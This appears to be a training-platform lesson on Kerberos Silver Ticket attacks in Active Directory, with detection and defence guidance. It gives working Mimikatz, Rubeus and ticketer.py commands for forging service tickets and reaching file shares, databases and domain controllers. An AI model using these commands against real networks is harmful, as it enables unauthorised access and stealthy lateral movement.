Silver Ticket Attack

Writeup | advanced | 35 min

Forging service tickets for targeted access

Learning Objectives

  • Understand silver tickets
  • Extract service account hashes
  • Forge service tickets
  • Access specific services

While Golden Tickets are the nuclear option (forging TGTs with the KRBTGT hash), Silver Tickets are the precision strike: forging service tickets (TGS) for one specific service using that service account's hash. No KDC contact is required to use one.

Think of it this way: Golden Ticket = master key to the entire building. Silver Ticket = key to one specific room. Less powerful, but often all you need - and much stealthier since you never talk to the KDC.

No KDC Required

Silver Tickets are validated by the service itself, not the KDC: the service decrypts the ticket with its own key and, unless PAC validation is enabled, never consults a DC. There is no TGS-REQ, so no 4769 is logged on any domain controller, which makes detection much harder.

How Silver Tickets Work

```text
Normal Kerberos service access:
1. User has a TGT (from the KDC)
2. User requests a TGS from the KDC for a specific SPN
3. KDC issues the TGS encrypted with the service account's key
4. User presents the TGS to the service
5. Service decrypts the TGS, validates it, grants access

Silver Ticket attack:
1. Attacker obtains the service account's NTLM hash (or AES key)
2. Attacker forges the TGS directly (no KDC contact!)
3. Attacker presents the forged TGS to the service
4. Service decrypts it and sees a valid ticket
5. Attacker has access (the KDC never knew!)

Why it works:
- Services decrypt tickets with their own key
- They trust the PAC (user, groups) inside the ticket after decryption
- By default they do not check the PAC with the KDC
```

Scope Limitation

A Silver Ticket only grants access to the specific SPN you forge it for: a cifs/dc.corp.local ticket will not authenticate to LDAP on the same host. Because every service running as SYSTEM on a host shares the machine account key, though, one machine-account hash lets you forge a separate ticket for each SPN on that host.

Requirements

```text
To forge a Silver Ticket you need:
├── Service account NTLM hash (or AES key)
├── Domain SID (S-1-5-21-...)
├── Domain name (corp.local)
├── Target SPN (service/hostname)
└── Username to impersonate (Administrator)

Where to get the service hash:
├── Kerberoasting (crack the password, then derive the NT hash from it)
├── DCSync (if you have replication rights)
├── NTDS.dit extraction
├── Mimikatz on a machine running the service (sekurlsa::logonpasswords, lsadump::secrets)
└── LSA secrets on a host where the account is configured as a service identity (secretsdump.py)
```

Machine Accounts

Computer accounts ARE service accounts. Services running as SYSTEM, LocalService or NetworkService authenticate with the machine account key, so the hash of MACHINENAME$ forges tickets for every SPN on that host: cifs, host, http, and on a DC also ldap. Machine account passwords rotate automatically (every 30 days by default), so a dumped hash has a shelf life.

Common Service SPNs

| Service | SPN format | Attack use |
|---|---|---|
| CIFS/SMB | cifs/hostname | File shares, PsExec |
| HOST | host/hostname | Scheduled tasks, WMI |
| HTTP | http/hostname | Web apps, WinRM |
| LDAP | ldap/hostname | AD queries on a DC; DCSync if the impersonated user holds replication rights |
| MSSQLSvc | MSSQLSvc/hostname:1433 | Database access |
| WSMAN | wsman/hostname | WinRM/PowerShell on some OS builds (HTTP is usually the SPN WinRM uses) |
| RPCSS | rpcss/hostname | RPC services; needed alongside HOST for WMI |
| TERMSRV | termsrv/hostname | RDP access |

```text
Most valuable targets:
├── CIFS on DC = file access to SYSVOL, C$
├── HOST on DC = scheduled tasks, WMI
├── LDAP on DC = AD queries (DCSync with the right impersonated user)
└── CIFS on file servers = data access
```

CIFS is Your Friend

CIFS (Common Internet File System) silver tickets are most useful. They grant SMB access for file shares, and tools like PsExec use SMB under the hood.

Forging Silver Tickets

Mimikatz

```
# Get the domain SID: run whoami /user and drop the RID (the last component)
# S-1-5-21-1234567890-1234567890-1234567890-1001
# Domain SID = S-1-5-21-1234567890-1234567890-1234567890

# Forge a CIFS silver ticket and inject it into the current session (one line in mimikatz)
kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /target:dc.corp.local /service:cifs /rc4:a9b30e5bxxxxxxxxxxxxxxxxxxxxxxxx /ptt

# Key parameters:
# /user:    - user to impersonate
# /domain:  - domain name
# /sid:     - domain SID
# /target:  - target server FQDN
# /service: - service name (cifs, host, http, etc.)
# /rc4:     - service account NTLM hash (use /aes256: instead where the environment is AES-only)
# /ptt      - pass-the-ticket (inject immediately)

# For a machine account hash (CIFS on the DC):
kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /target:dc.corp.local /service:cifs /rc4:DC_MACHINE_ACCOUNT_HASH /ptt
```

Impacket (Linux)

```bash
# Create a silver ticket for CIFS on the DC (no DC is contacted, so -dc-ip is not needed)
ticketer.py -nthash a9b30e5bxxxxxxxxxxxxxxxxxxxxxxxx \
  -domain-sid S-1-5-21-1234567890-1234567890-1234567890 \
  -domain corp.local -spn cifs/dc.corp.local Administrator

# Writes Administrator.ccache; point Kerberos-aware clients at it
export KRB5CCNAME=Administrator.ccache

# Always address the target by the FQDN used in the SPN, never by IP,
# otherwise the client looks for a ticket for a different SPN.
# Access file shares
smbclient.py -k -no-pass corp.local/Administrator@dc.corp.local

# PsExec (rides on CIFS)
psexec.py -k -no-pass corp.local/Administrator@dc.corp.local
```

Rubeus

```powershell
# Forge a silver ticket. Rubeus takes the full SPN in /service: (there is no separate /target:)
.\Rubeus.exe silver /service:cifs/dc.corp.local /user:Administrator /domain:corp.local /sid:S-1-5-21-... /rc4:a9b30e5b... /ptt

# With an AES256 key (stealthier: an RC4 ticket stands out where policy is AES-only)
.\Rubeus.exe silver /service:cifs/dc.corp.local /user:Administrator /domain:corp.local /sid:S-1-5-21-... /aes256:... /ptt

# Confirm the ticket landed in the cache
klist
```

Attack Scenarios

Scenario 1: File Share Access

```bash
# You cracked a file server service account password
# or dumped the file server's machine account hash

# Forge a CIFS ticket for the file server
ticketer.py -nthash FILE_SERVER_HASH -domain-sid S-1-5-21-... \
  -domain corp.local -spn cifs/fileserver.corp.local Administrator

export KRB5CCNAME=Administrator.ccache
smbclient.py -k -no-pass corp.local/Administrator@fileserver.corp.local
```

Scenario 2: Database Access

```bash
# You Kerberoasted and cracked the svc_sql password.
# ticketer.py takes the NT hash, not the password: compute it first
# (MD4 over the UTF-16LE password), then pass it with -nthash.

# Forge an MSSQLSvc ticket. The impersonated user can be anyone; pick an
# account that is a SQL sysadmin rather than svc_sql itself if you know one.
ticketer.py -nthash SQL_SVC_HASH -domain-sid S-1-5-21-... \
  -domain corp.local -spn MSSQLSvc/sql.corp.local:1433 svc_sql

export KRB5CCNAME=svc_sql.ccache
mssqlclient.py -k -no-pass corp.local/svc_sql@sql.corp.local
```

Scenario 3: WinRM Access

```powershell
# Forge an HTTP ticket for WinRM (one line in mimikatz)
kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /target:server.corp.local /service:http /rc4:SERVER_MACHINE_HASH /ptt
# Depending on the OS build, WinRM also wants a HOST (sometimes WSMAN) ticket for the
# same server: forge those the same way from the same machine-account hash.

# Now use WinRM (address the server by the FQDN in the SPN)
Enter-PSSession -ComputerName server.corp.local
```

Scenario 4: DC Access via CIFS

```text
# If you have the DC's machine account hash (DC01$), forge a CIFS ticket for the DC

# This gives you:
├── Access to SYSVOL (GPOs, scripts)
├── Access to NETLOGON
├── Access to C$ (the forged PAC says you are Administrator)
└── Ability to use PsExec

# But NOT:
├── DCSync (needs an LDAP ticket plus replication rights on the impersonated user)
├── Creating AD objects
└── Modifying AD
```

Golden vs Silver Tickets

| Aspect | Golden Ticket | Silver Ticket |
|---|---|---|
| Ticket type | TGT | TGS |
| Key required | KRBTGT hash | Service account hash |
| Scope | Entire domain | Single service (SPN) |
| KDC contact | Yes (to get a TGS) | No |
| Detection | Easier (KDC logs) | Harder (service only) |
| Invalidation | Reset KRBTGT twice | Reset the service account password |

Detection & Defense

```text
Detection challenges:
├── No TGS request to the KDC (no 4769 on any DC)
├── Service validates the ticket locally
├── Looks like normal service access
└── Hard to distinguish from legitimate tickets on the wire

What CAN be detected:
├── Event ID 4624 on the target (logon type 3, Kerberos) with no matching 4769 on any DC
├── PAC validation failures (if enabled)
├── Tickets with impossible or mismatched fields (unknown SIDs, odd domain casing, RC4 where policy is AES-only)
├── Services accessed that the user never touches
└── Unusual service-to-service authentication

Defense:
├── Enable PAC validation (adds DC round-trips)
├── Monitor for unusual service access patterns
├── Use Group Managed Service Accounts (gMSA), whose passwords rotate automatically
├── Rotate service account passwords regularly (a reset invalidates every ticket forged under the old key)
├── Implement credential tiering so service hashes never land on low-tier hosts
└── Monitor for tools like Mimikatz, Rubeus
```
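An added example, not part of the original page: the "4624 without a 4769" observation turned into correlation logic over constructed log events. It assumes 4624 events from member servers and 4769 events from every DC have been collected into one place with the fields shown; the hostnames, accounts, addresses and times are made up. The join key is (user, service account) rather than (user, host), because the 4769 Service Name is the account that owns the SPN (HOST$ for services running as SYSTEM), and the look-back defaults to the 10-hour TGS lifetime because a cached ticket can be reused long after it was issued.

```python
"""Flag Kerberos network logons on a host that no DC ever issued a service ticket for."""
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry).
DC_4769 = [  # TGS requests, collected from every domain controller
    {"time": "2024-05-01T08:55:00", "account": "jsmith@CORP.LOCAL", "service": "FS01$", "ip": "10.0.0.50"},
    {"time": "2024-05-01T09:10:00", "account": "backup_svc@CORP.LOCAL", "service": "DC01$", "ip": "10.0.0.60"},
]
HOST_4624 = [  # logons on member servers / DCs
    {"time": "2024-05-01T09:00:10", "host": "FS01", "account": "jsmith", "logon_type": 3, "auth_pkg": "Kerberos", "ip": "10.0.0.50"},
    {"time": "2024-05-01T09:12:00", "host": "DC01", "account": "backup_svc", "logon_type": 3, "auth_pkg": "Kerberos", "ip": "10.0.0.60"},
    {"time": "2024-05-01T11:30:00", "host": "DC01", "account": "Administrator", "logon_type": 3, "auth_pkg": "Kerberos", "ip": "10.0.0.99"},
    {"time": "2024-05-01T11:31:00", "host": "DC01", "account": "jsmith", "logon_type": 3, "auth_pkg": "NTLM", "ip": "10.0.0.50"},
]


def _t(s):
    return datetime.fromisoformat(s)


def find_unrequested_kerberos_logons(host_events, dc_events,
                                     window=timedelta(hours=10), spn_owner=None):
    """Return 4624 events (network logon, Kerberos) with no 4769 for the same
    user and service account in the preceding `window`.

    spn_owner maps host -> service account for services that run under a user
    account (e.g. {"SQL01": "svc_sql"}); otherwise HOST$ is assumed.
    """
    spn_owner = spn_owner or {}
    issued = {}
    for ev in dc_events:
        user = ev["account"].split("@")[0].lower()
        issued.setdefault((user, ev["service"].upper()), []).append(_t(ev["time"]))

    suspicious = []
    for ev in host_events:
        # A silver ticket shows up as a Kerberos network logon; NTLM is a different hunt
        if ev["logon_type"] != 3 or ev["auth_pkg"] != "Kerberos":
            continue
        t = _t(ev["time"])
        owner = spn_owner.get(ev["host"].upper(), ev["host"].upper() + "$")
        key = (ev["account"].lower(), owner.upper())
        if not any(t - window <= issued_at <= t for issued_at in issued.get(key, [])):
            suspicious.append(ev)
    return suspicious


if __name__ == "__main__":
    for ev in find_unrequested_kerberos_logons(HOST_4624, DC_4769):
        print(f"{ev['time']} {ev['account']} -> {ev['host']} from {ev['ip']}: no matching 4769")
```

Expect false positives if any DC's 4769 stream is missing or if clocks drift, and remember that a ticket cached before your retention window started will also have no visible 4769.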

PAC Validation

By default, a service running as SYSTEM (or any account holding SeTcbPrivilege) trusts the PAC (Privilege Attribute Certificate) in a decrypted ticket without asking the KDC; it checks only the PAC's server checksum, which an attacker holding the same service key can compute. PAC validation forwards the PAC's KDC checksum to a DC over Netlogon, which catches silver tickets because the forger cannot produce a checksum under the krbtgt key. The ValidateKdcPacSignature value (DWORD, 1 = validate) under HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters controls this behaviour, at the cost of an extra DC round-trip per logon.
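A toy model, added here and not from the page, of the signature chain that decides whether a forged ticket is accepted, illustrating both the "why it works" list above and this PAC validation note. It keeps the real PAC structure (a server checksum under the service key, and a KDC checksum over that server checksum under the krbtgt key) but stands in HMAC-SHA256 for the Kerberos checksum types, omits the ticket encryption (the attacker holds the service key, so it changes nothing), and uses constructed keys and PAC contents.

```python
"""Why a service accepts a silver ticket, and what PAC validation adds."""
import hashlib
import hmac
import json
import os


def _mac(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.sha256).digest()   # stand-in for Kerberos checksums


def _pac_bytes(pac: dict) -> bytes:
    return json.dumps(pac, sort_keys=True).encode()


def kdc_issue_service_ticket(pac, service_key, krbtgt_key):
    """Legitimate TGS: the KDC holds both keys, so both checksums are genuine."""
    server_sig = _mac(service_key, _pac_bytes(pac))
    return {"pac": pac, "server_sig": server_sig, "kdc_sig": _mac(krbtgt_key, server_sig)}


def forge_silver_ticket(pac, service_key):
    """Attacker knows only the service key: the server checksum is valid,
    the KDC checksum has to be faked."""
    server_sig = _mac(service_key, _pac_bytes(pac))
    return {"pac": pac, "server_sig": server_sig, "kdc_sig": os.urandom(32)}


def kdc_validate_pac(server_sig, kdc_sig, krbtgt_key):
    """What a DC does when a service forwards the PAC checksums over Netlogon."""
    return hmac.compare_digest(_mac(krbtgt_key, server_sig), kdc_sig)


def service_accepts(ticket, service_key, validate_pac=False, krbtgt_key=None):
    """Service-side decision. Without PAC validation only the server checksum
    is verified, which the attacker can produce; with it, the DC must confirm
    the KDC checksum, which the attacker cannot."""
    expected = _mac(service_key, _pac_bytes(ticket["pac"]))
    if not hmac.compare_digest(expected, ticket["server_sig"]):
        return False
    if not validate_pac:
        return True
    return kdc_validate_pac(ticket["server_sig"], ticket["kdc_sig"], krbtgt_key)


# Constructed keys and PAC contents (no real material)
SERVICE_KEY = hashlib.sha256(b"DC01$ machine account key (constructed)").digest()
KRBTGT_KEY = hashlib.sha256(b"krbtgt key (constructed, unknown to the attacker)").digest()
ADMIN_PAC = {"user": "Administrator", "groups": [512, 519, 513],
             "domain_sid": "S-1-5-21-1234567890-1234567890-1234567890"}


def demo():
    """Outcome of a legitimate and a forged ticket with PAC validation off and on."""
    legit = kdc_issue_service_ticket(ADMIN_PAC, SERVICE_KEY, KRBTGT_KEY)
    forged = forge_silver_ticket(ADMIN_PAC, SERVICE_KEY)
    return {
        "legit_default": service_accepts(legit, SERVICE_KEY),
        "forged_default": service_accepts(forged, SERVICE_KEY),
        "legit_validated": service_accepts(legit, SERVICE_KEY, True, KRBTGT_KEY),
        "forged_validated": service_accepts(forged, SERVICE_KEY, True, KRBTGT_KEY),
    }


if __name__ == "__main__":
    for case, accepted in demo().items():
        print(f"{case:18s} {'ACCEPTED' if accepted else 'REJECTED'}")
```

Note that the validation path only helps if the DC is actually asked: a service that skips it (the SYSTEM default) behaves exactly like `validate_pac=False`.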

Silver Ticket Methodology

Silver Ticket Attack Flow

1. Obtain hash: get the service account hash (Kerberoast, dump, etc.)
2. Identify target: determine which service (SPN) to access
3. Get domain SID: whoami /user or Get-ADDomain
4. Forge ticket: use Mimikatz, Rubeus or ticketer.py
5. Inject: pass-the-ticket into the session (or export KRB5CCNAME on Linux)
6. Access: connect to the service with the forged ticket

Knowledge Check


What key difference makes silver tickets stealthier than golden tickets?

Challenges

Precision Strike (advanced)

After Kerberoasting a service account, forge a silver ticket to access the service without triggering KDC-based detection.

Key Takeaways

  • Silver tickets forge TGS tickets for specific services
  • Require service account hash, not KRBTGT
  • No KDC contact = much stealthier than golden tickets
  • Limited scope - one service per ticket
  • Machine accounts work for services running as SYSTEM
  • Reset service password to invalidate